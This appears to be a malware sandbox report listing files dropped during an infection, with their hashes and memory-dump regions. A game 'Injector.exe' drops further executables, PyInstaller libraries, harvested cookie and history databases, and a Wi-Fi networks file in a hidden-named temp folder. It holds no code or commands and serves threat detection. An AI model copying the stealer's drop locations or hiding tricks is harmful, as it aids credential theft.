MD5 c04bcb82a84e38916665757851fc49cc
SHA1 196ff9cb450ec193e3be364fe44d7149205f0b93
SHA256 11eec99a6ac4fd78417bd804e81a629a55929ea4c45a2947c8234d1df8158579
SHA512 001f7353e33b02a59e5320a0a288e8ec632eb7b9de8290c19e82c3c9dee313c03474b4dfa70f3ec0f11cf28fa143e32877f72159fe5a7701e3aa01a3ef4c2e1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

MD5 26d663b1b0d0e22ed9eac024323c5aec
SHA1 32f1ba6aabd90be6ad89ee7d9ae029742569ccb8
SHA256 c1f49c4ee65365d6e8c20c7243fec520081334d7eb5ebfaf0736bb1b333e08c2
SHA512 08d2a9d271c14456c7fe8fa0b8d14b93faffc92f8d348dbe13edbfcaa0becaf5035aa58b583daaa23ef29a931ac6dd0a821f0010850fd9b747c3bdcc6436acc5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 b54e6a8428f252fee8815d9d8e991a92
SHA1 798938bf88f5e4f5d3eecdc2cf49487b5efb8f17
SHA256 f746e647518bbdc085e252d91f5da35d73d560259cf23867df4172c6c49147f9
SHA512 9ec47eb25a144d89c6cb6523008932e4e051a60b93a48279b7a6515015b600610c184d8443910d6ab7b98440c2cbdfa4fc0e737a84acbb77ce36fad0ab630b09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

MD5 8af64a090194ed847c44dc10367e4b8e
SHA1 ec36047ff549a66218a18ce68044defd245c1b01
SHA256 97df3d7079dc4312f4284ed9903ac1eff372956e2fb4aa0a284ac3de3120878c
SHA512 c5ab60c4b09cb3f894b93c00269747e45c1a67b0c8dcc859e1bcfe67f31a54ba062cddc0bc18c882761cce9a3ea795ba2c68aaa827ddb5938280f4498d33037c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

MD5 7bcc499ce01bf0bbc40d2b953c58516e
SHA1 9a01c3fcf973069f988f6fd5e3e6d8cceeecaa10
SHA256 0549365a43492f7128b7b61792866e16c73db40c440505dfd12c80964d78b09c
SHA512 0df5dd63d5eda8bea05bc593cfe1e4b391b2a26f8ca7b903df31f6bcb093f1059f7cc9850424c7c3d84134a56861b05a967f1638f766f79b29b233ed8e68a258

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13357011505528057

MD5 8606d733bb6862237e5a76bc267f940e
SHA1 f4ca76a96390593e8dcc66c8d41fe51d4cc86416
SHA256 82b2e4296a139986d6ea36905e0fd530aec41d2a234ef6ca25f8ff1b507ad7e1
SHA512 04dd34dbed845cae57319f9883aa5f490d98855e830573fc333cbdae70bea58f99d93ac9dee7218002c9a1392721cdd1ab0b7f3ca21d137974f812b8a561ec0a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 87beb8369e3b2688e87453e6a2e9a56b
SHA1 285daf7e6cbe3617e65e2244f8a5880151f09dc1
SHA256 b6e092635b42c08b4174115b288fb0294ad8b4d74a402a337bda341114f8aa4b
SHA512 a9eda1a89b1d57b0c1eaca8380abfa0b89f0e31829d979d7309f0257e3185fa82a4145258ec23de0f757457d6cdc3fefb5df100f7ceffecfa72d3a846d56d856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db243a72b2e246857b9f68d2d752f9f1
SHA1 b24676fbb26672f15934be116b69a8c53922c107
SHA256 34c0483e5e80f24f7074880b970354bf2139d934311f0e8e0291615dbb0cfce2
SHA512 72f42bd9e1fd902cc4ee9783adcdee062b97276b779c91269bc60f7dd0bbf911a588de5f33c1ad5f17e59b7f97e2f04bed7a85f3d554bb574e176307adaa5068

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 c0af0b03765b4a03458743d620c8491b
SHA1 cc1e9b5cf85d1dbe9449740a3418f2ce05c8728d
SHA256 3bc292a46146d43be789e78b8db6ba816b41dd3c784a737cd98cc2b3dfcf2234
SHA512 443ee527d2572e39aff0382026f4b638fdd4635d4e28531d84efa552d034434b5be5c5ce9528240087d5403649d5a883fa6d577b53b66c0f6c2b180385b1573d

C:\Users\Admin\Desktop\rage free\Injector.exe

MD5 af1600933561571a811579e73ef2a78f
SHA1 89dbc08104c92fa2d296d2dcdd0cb2152c5ebf4a
SHA256 7ffea64e10fe0b27f31a2e97e3ec8eaf88a3468d282a53ab1d46ee0f868a9709
SHA512 1160ec22d94171837c25ce1f00f6c31cca3725c3a8564cab5278d28f184b7872226a6abb1c24e28ddec0345a79efdef8a4fcfa28d7f7db2cca1d6234bb8927d7

memory/836-239-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/836-240-0x0000000000800000-0x00000000018A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\injector.exe

MD5 15fa4864c56c1bc724f1098aba8f08fb
SHA1 faad863bfde036ac3ea9c65090fcdf8716d8147c
SHA256 3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993
SHA512 75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465

C:\Users\Admin\AppData\Roaming\creal.exe

MD5 43a1e4b885c35fa760c6669c670165b2
SHA1 1deea5bd35d69d98c5ff7ac2424004d2ae0e080b
SHA256 951600adde3d082e2fd9d832d1861c752ad7b3735ecbff956f7029f019572dba
SHA512 5b4b8066e1380c02a92ec5cc7387af6cd6ea169deae6462ed649113daf633c33aded3bb2b41999eeeacd5a6b820c1000065406736b4b6610275517fe0835d201

C:\Users\Admin\AppData\Roaming\Nothere.exe

MD5 20e7e9c5171c2990ffeed3ae319d1d9b
SHA1 efb8fc011d96166707442eadc9b757dad780d33c
SHA256 3385b4692ff4096c8b13c72105819f29f6f6664b3437614995339da93da317ba
SHA512 2f1a206de64d52faab38ea678ddbf2c3a9e3c04f24c974e30b44a693d780184606461ddc4a9ee998c4d41582f7c5202151d872c520c32bc1496e8b8c05c22481

memory/60-332-0x0000000000F80000-0x0000000000F9C000-memory.dmp

memory/60-330-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/836-329-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28962\python312.dll

MD5 5c5602cda7ab8418420f223366fff5db
SHA1 52f81ee0aef9b6906f7751fd2bbd4953e3f3b798
SHA256 e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce
SHA512 51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f

C:\Users\Admin\AppData\Local\Temp\_MEI28962\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\_MEI28962\base_library.zip

MD5 3909f1a45b16c6c6ef797032de7e3b61
SHA1 5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8
SHA256 56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44
SHA512 647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_ctypes.pyd

MD5 10fdcf63d1c3c3b7e5861fbb04d64557
SHA1 1aa153efec4f583643046618b60e495b6e03b3d7
SHA256 bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3
SHA512 dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

C:\Users\Admin\AppData\Local\Temp\_MEI28962\python3.DLL

MD5 77896345d4e1c406eeff011f7a920873
SHA1 ee8cdd531418cfd05c1a6792382d895ac347216f
SHA256 1e9224ba7190b6301ef47befa8e383d0c55700255d04a36f7dac88ea9573f2fb
SHA512 3e98b1b605d70244b42a13a219f9e124944da199a88ad4302308c801685b0c45a037a76ded319d08dbf55639591404665befe2091f0f4206a9472fee58d55c22

C:\Users\Admin\AppData\Local\Temp\_MEI28962\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_bz2.pyd

MD5 c7ce973f261f698e3db148ccad057c96
SHA1 59809fd48e8597a73211c5df64c7292c5d120a10
SHA256 02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde
SHA512 a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

C:\Users\Admin\AppData\Local\Temp\_MEI28962\_lzma.pyd

MD5 4e2239ece266230ecb231b306adde070
SHA1 e807a078b71c660db10a27315e761872ffd01443
SHA256 34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be
SHA512 86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

C:\Users\Admin\AppData\Local\Temp\_MEI28962\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

memory/60-370-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trc1ly3f.flw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3288-380-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3288-381-0x00000159241D0000-0x00000159241E0000-memory.dmp

memory/3288-382-0x00000159241D0000-0x00000159241E0000-memory.dmp

memory/3288-383-0x000001590BD30000-0x000001590BD52000-memory.dmp

memory/3288-387-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4688-388-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4688-389-0x000001EB6A150000-0x000001EB6A160000-memory.dmp

memory/4688-390-0x000001EB6A150000-0x000001EB6A160000-memory.dmp

C:\Windows\SoftwareDistribution\Download\qOTtu.exe

MD5 9886a738e05f8a8fe04e9d0c81cc0909
SHA1 f659c6a123eb11f6f34f618265dbd54a9aa7f5e3
SHA256 abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6
SHA512 0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21

memory/4688-433-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4128-434-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/4128-435-0x000001F16C610000-0x000001F16C620000-memory.dmp

memory/4128-441-0x000001F16C610000-0x000001F16C620000-memory.dmp

memory/4128-447-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1508-457-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1508-458-0x000001F037C60000-0x000001F037C70000-memory.dmp

memory/1508-459-0x000001F037C60000-0x000001F037C70000-memory.dmp

memory/1508-461-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/60-466-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/60-502-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

memory/2716-505-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3592-506-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2716-519-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3592-579-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2888-590-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcrfcuvejrx.db

MD5 17a7df30f13c3da857d658cacd4d32b5
SHA1 a7263013b088e677410d35f4cc4df02514cb898c
SHA256 c44cbdf2dbfb3ea10d471fa39c9b63e6e2fc00f1add109d51419b208a426f4d0
SHA512 ea96cc3e2a44d2adeca4ecb4b8875a808ef041a6a5b4ae77b6bfd1600dd31f449b51b1a5997064c43e5111861ac4e3bc40a55db6a39d6323c0b00ff26d113b72

C:\Users\Admin\AppData\Local\Tempcrwncvufjj.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/2888-637-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bdb31304-4d90-4426-824c-486dfad97b24.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 41706d2b2a16b6d290f46679e6b7b771
SHA1 33dd64efcfa78ff597b08be7196cb4043f6ea3c4
SHA256 78775317aff1245112a3a83bf74c3309ad0ad35e0e748c9073e4b294bdc70817
SHA512 6d3fe340eae01c6003826be2baa5a18c8d9bb5ee1ee98d4d53965a8a600eb6cbd61911382e04e6eb1f784905c9e7c72fd6e9e7d9cec0c51e25f6e239d8617171

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5eb306884214ba64013c76328bb9f9d4
SHA1 8ae9deb1eed606480272141ec89e9685c8f42a93
SHA256 48685e871e5bbb448c6b893a8de2989f43a2729a56e1a7f343fdc778d54c7cdf
SHA512 158882d48d93c90bda31562a682f1f9fcebee34e5f3b733749d8374d367e77cf5111870295b38732f2e6dc0a367d9bacf190e7a1562a7f8dba4edc3eba627065

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/60-715-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 72542e6d6762532ae6dfb8e4a16d84bc
SHA1 1e78d4bf7e026e801f6f6a196a093854ff39141e
SHA256 d30ad474e6663f4a1808834a21db9b7ad8341a4650fb4a4e469cb2283eeea68c
SHA512 79714f71c146b5c25b40f2dd3ad323bcea239d0dcd07a5d070b3c72db156d18ef5cf4dad9035ff93848b697f562639aadc2ab6ddc18a73e55ed0ccf45e552681

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e5f73567509714128ad2e4c9bd06f6f5
SHA1 8db3aa6571db9fa3a6c484ca668df4f3338965fc
SHA256 55613b89c1c9734c33e19ce021a277573a6f95716c49e83e6254ec3c801b423f
SHA512 8a49adb4306bd1a6189f2b528880b97888ff1f9488ea915a6f0c78c74e5dc9c1458c86529ef21e9a3b91aa30172829ec511f74c6c1de539d7f9bb0c552f4f75f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe598032.TMP

MD5 c2bcb6bad8febfb4dd6460c6ddf3a152
SHA1 6a96ec3a6c6f047fa0e387fc72ef2c39ee2a6936
SHA256 8060187ecb9510af3f417c5dcbb6e3caa896c3c54fb8c586066b39b71eed124f
SHA512 cebd788d42b305a1ba6fe1cd66078078a40df2bd1450e37eb5ab20100a190fd30250da7edf00589d2ada2a609df9e2d34c75602fdec86ac37391b785a7bf0816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 72fed3b3d447ba8bda2726db18f24d5b
SHA1 311fd6f1b00736b2b68fcb124ec6676e9b2f93c1
SHA256 3988a6d85e1a4baa4f86fbf0a7bfbbf4c3b07e810610abe120c4869bb0357401
SHA512 cfe1afbb9fe93b8cb4c0d3a28cfecfe7e2290a5d5a49bb429fe393da6046c2e5a2b726c4df11d1b088071132cea291cf7df115db19ca7466c38de58c23481b27

memory/60-1144-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f77aca7f8bccd5c5369b7d95184363a2
SHA1 4a220187c6bc25e8fe56edcb923e82238083466a
SHA256 6be586cd7a9e4ed49096d2482d379606c243ee5f30e9ecb393de535bd0b880f3
SHA512 b4511d7b04b112632536bf7339b6ec979152151264bb6e1ac05fc6f3c9c81ca7efca2ea6d0e6da4fc27ea7ddeca6080a95a604cb43353304435c0f542d4b9faf

C:\Users\Admin\Downloads\Unconfirmed 329195.crdownload

MD5 1ddc7adb668ac48d1d461d933b9c8491
SHA1 a9861fe2cfec52b2c2527c0b6c949b2ac62cd1df
SHA256 0fce1d43800b811df4fdba2c480570a004556f24f564cf4a2b0fe9d51d9da8b5
SHA512 22ead27c8b345bd5db131bad9f0719a32ebff74fb55af171900a04e2e453a7f4f77be663a219e56ce699c67243328e5772af0d9bfbdc1d4de6d375d50f3ce38c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9e2bca5f35ae6a906143131b3284e97f
SHA1 68b06c530c955eb1a7c5898e7d3f8990cd6b01f9
SHA256 6d30c7143e6f435e8ae03c2f47303d761bb7cbff74528d6a3dc6d53e420d79ca
SHA512 e91fa94642a9950227ff30db4f6525146124b6936588ccbb60f6cb197a31f4a01ef3518b92910cbc9e02b04ccd5477cb0c795e4f6e92a0910feec2ea542bc11e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c582d229375dd238a312893b07000da5
SHA1 27da8e0b486fa65a5325bc85d2b8cc1f855e6954
SHA256 7b7ce6a95d435078455b9fb406430c270b93a2357c1e0b2eb442bab1b3bf15db
SHA512 cf71d14e0cf09aef5f22727ec3755cb93b71334a4e0a3d59ab6172a70d3845093d634a33a7ffa83156059641092b6d6b949d0f4d8d1488d50bd63997c0e98b47

memory/2612-1188-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/2612-1198-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\dab77623-2dc5-4eea-bb1c-aa35f1d1d26a.tmp

MD5 aa2f4f411a772c63b1a30dcfdc62e4d8
SHA1 d8a4097faf688f64597f3d76597c5e20703aa7d2
SHA256 cfc8a3796345cd9e0895e1df91f4ffe9eebfd142568b853a52fd4e84de20e220
SHA512 0e4283f522d23f5f2dc6b0917f2bdc3b066424983dae2678a871d6a88fb65ae2123ed52fb46c7aad7dae941e83a78953644a311314b12c457e2c43ad0cd8a692

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b59b2bf7610ca9ac075d679c586e2961
SHA1 4c9ec9451dc9e51bd96e73757be1fd163276aaf4
SHA256 e9dda9d2382ce7ec9e5ac0002ddc6f9d51dc16867f66d231c3b7aad40d564a6d
SHA512 f0ebb58fbb11d1d18e1497405c7b61849107e80c8ecb2baa51e3d26c24b7a9a884250f73e0e765d33ad06308f623b29708b98460b3c7a73ba29d6d47a5759275

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4141642404b71d1732f4049e94bbb01b
SHA1 5a39bafebd0cc2ddf945ce89cae74d6192644986
SHA256 7fe572b5aa5afd3bef7b7a683a65c438eb256eede229930987e73d26fc00dcca
SHA512 f44ccdb8343570416a039265c4fc59bfaca29cbaa5b4bed85fc07dd0bbbc866a9f2f07f790dde5e6cfb7d1a3db608947b198ba33522ba6e76d9b0b95ffffbb51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 663026bd976e0e2836cee4d32bfc8b7e
SHA1 b86d0595c42a1fc0f7fbcba4bfe5ffc9dad44038
SHA256 b4f86202265ffc484b496da5dfcf5c51470db9581b65bfba61b16d8fe21fc05a
SHA512 e92fae5c357af911ffe01048612753b60e1a0082c2afe024e7f25b746818416a6573765691a3f38251813ee19a8b5535147af71886e81a03b792ab813c7d4513

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6d761b7cd38acfc6e3a42c74f828ee9c
SHA1 5f552446ba3b0a3a60a49f1c68e16f57354a5895
SHA256 8a63a8b9c4d7ca7f9bee23d792166dfc1a8355e63dc086808b127843211e6cec
SHA512 e66f6a57b6c7f62985cd01d01f7351d767c9f560689c205a28ab52900faf1a5c405a1b5744e64d4001961f806414d89e4f07c674b9c6a5c4ecbfd332aaed991e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9f28afca79c86820f4e042e3c0b1e928
SHA1 c6aac1c5760670da30c8d37a38877cf9118592f1
SHA256 f877eb419cc9c3ff6a95220bc37bf42c9feeb46e1a3bc7b848950b98dc347883
SHA512 6c52cdb529a0e1c815569c4c3529fab368d5e5649bf18697fdb9e899fa4936bcdc2ad7d0b4d6f71b22c004aadd3190c1e822f7f58bf4aa4360f60a783fa21220

memory/3896-1285-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3896-1288-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload

MD5 3ff918605edb3c47b8cfc682ce6f84dc
SHA1 a28f623c63c40a7273140c630d637af457966503
SHA256 53665fcb003261702188950b5b7a542ef3361b2861a1a8420d7171a78170a2ca
SHA512 43d88c3ca0202e702877981b077503a22c4008460405bf995c82cf8a150d909ddf511603aaca6de370daf021280ec66515b93f4b5d7da42ead3f862f81a8098d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a64c0453203500b85aaf95d1cb441445
SHA1 02670f8a787f9ab79d804f91be14c56a60d82850
SHA256 316dad135ba4612118cbe2e5dbdf0bb96def7c71aeaacf143e4747a6b177a6f4
SHA512 e936d13431f17093a001bb9f40e1e3d4a5e270711f80e81085dbc0f7d725d6813414bc46832f7cd8fd4d6d9eb3caefb3b5b7a77118f43c918f1adb78f90511a8

memory/5068-1386-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1387-0x00007FF987870000-0x00007FF98789D000-memory.dmp

memory/5068-1388-0x00007FF987780000-0x00007FF987799000-memory.dmp

memory/5068-1389-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/5068-1391-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1390-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5068-1392-0x000001B5AA050000-0x000001B5AA3C5000-memory.dmp

memory/5068-1394-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1393-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1395-0x00007FF983DE0000-0x00007FF983DF4000-memory.dmp

memory/5068-1396-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

memory/5068-1397-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1399-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1398-0x00007FF983CA0000-0x00007FF983CC3000-memory.dmp

memory/5068-1400-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1402-0x00007FF9838F0000-0x00007FF98391F000-memory.dmp

memory/5068-1401-0x00007FF983AD0000-0x00007FF983AFB000-memory.dmp

memory/3752-1408-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/3752-1410-0x000002D9D6E10000-0x000002D9D6E20000-memory.dmp

memory/3752-1414-0x000002D9D6E10000-0x000002D9D6E20000-memory.dmp

memory/5068-1415-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/372-1425-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/372-1426-0x000002702FE70000-0x000002702FE80000-memory.dmp

memory/1856-1437-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/372-1438-0x000002702FE70000-0x000002702FE80000-memory.dmp

memory/3752-1440-0x00007FF9735A0000-0x00007FF974061000-memory.dmp

memory/1856-1439-0x000002C7599E0000-0x000002C7599F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI42562\cookiesData.db

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\_MEI42562\historyData.db

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Temp\chp9123.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/5836-1569-0x0000000000400000-0x0000000000484000-memory.dmp

memory/5068-1612-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1617-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1619-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1618-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1624-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1623-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1629-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5068-1630-0x00007FF987870000-0x00007FF98789D000-memory.dmp

memory/5068-1631-0x00007FF987780000-0x00007FF987799000-memory.dmp

memory/5068-1632-0x00007FF983E00000-0x00007FF983E19000-memory.dmp

memory/5068-1633-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5068-1635-0x00007FF9830B0000-0x00007FF983168000-memory.dmp

memory/5068-1636-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5068-1634-0x00007FF983CD0000-0x00007FF983CFE000-memory.dmp

memory/5068-1637-0x00007FF983DE0000-0x00007FF983DF4000-memory.dmp

memory/5068-1640-0x00007FF974CD0000-0x00007FF974E3F000-memory.dmp

memory/5068-1642-0x00007FF983AD0000-0x00007FF983AFB000-memory.dmp

memory/5068-1643-0x00007FF9838F0000-0x00007FF98391F000-memory.dmp

memory/5068-1644-0x00007FF96F210000-0x00007FF96F32C000-memory.dmp

memory/5068-1641-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5068-1645-0x00007FF983490000-0x00007FF9834D3000-memory.dmp

memory/5068-1639-0x00007FF983CA0000-0x00007FF983CC3000-memory.dmp

memory/5068-1638-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ‌\System\Wifi Networks.txt

MD5 5002192a3d6b89de74e57fbd25736e95
SHA1 cb539f8b93afae00aa5caa93b0215122a04f5db6
